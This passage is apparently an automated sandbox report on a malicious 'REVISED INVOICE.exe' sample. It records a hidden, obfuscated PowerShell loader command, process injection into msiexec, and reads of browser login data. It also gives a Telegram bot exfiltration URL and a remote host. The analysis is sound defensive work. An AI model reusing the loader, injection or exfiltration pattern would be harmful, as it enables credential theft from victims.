          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msacm32.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: webio.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: credssp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: depoh.lnk.0.dr LNK file: ..\..\..\seniors.tal
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: REVISED INVOICE.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.481790461.0000000004E36000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match File source: 00000003.00000002.482186551.0000000009778000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_06460AC8 push ebx; retf 3_2_06460AC9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_064636B5 pushfd ; iretd 3_2_064636B6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_06462082 push esp; retf 3_2_06462084
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_064608BA push ebp; ret 3_2_064608E3
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 5_2_01D40AC8 push ebx; retf 5_2_01D40AC9
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 5_2_01D42082 push esp; retf 5_2_01D42084
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 5_2_01D436B5 pushfd ; iretd 5_2_01D436B6
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 5_2_01D408BA push ebp; ret 5_2_01D408E3
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 5_2_214B21AC push ebx; iretd 5_2_214B21EA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5524
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2260 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2276 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3244 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3720 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3720 | Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3724 | Thread sleep count: 282 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3724 | Thread sleep count: 9537 > 30
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_00406362 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_004027FB FindFirstFileW
Source: REVISED INVOICE.exe, REVISED INVOICE.exe.3.dr | Binary or memory string: hGfSR
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | API call chain: ExitProcess graph end node (graph_0-3341)
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | API call chain: ExitProcess graph end node (graph_0-3344)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 1D40000
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetFolderPathW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

          Stealing of Sensitive Information

Source: Yara match | File source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2504, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2504, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2504, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 DLL Side-Loading | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 311 Process Injection | 12 Masquerading | Security Account Manager | 1 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Modify Registry | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
REVISED INVOICE.exe | 3% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe | 3% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://reallyfreegeoip.org | 0% | URL Reputation | safe |
http://checkip.dyndns.com | 0% | URL Reputation | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://checkip.dyndns.org | 0% | URL Reputation | safe |
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://reallyfreegeoip.org | 0% | URL Reputation | safe |
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.186.142 | true | false | | unknown
drive.usercontent.google.com | 142.250.186.97 | true | false | | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 193.122.130.0 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/173.254.250.71 | false | | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf | msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org | msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot | msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://ocsp.entrust.net03 | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/t | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.diginotar.nl/cps/pkioverheid0 | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.google.com/ | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/search?q=wmf | msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://reallyfreegeoip.org | msiexec.exe, 00000005.00000002.629157566.00000000221EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.com | msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net0D | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a | msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.480576580.0000000002531000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i | msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
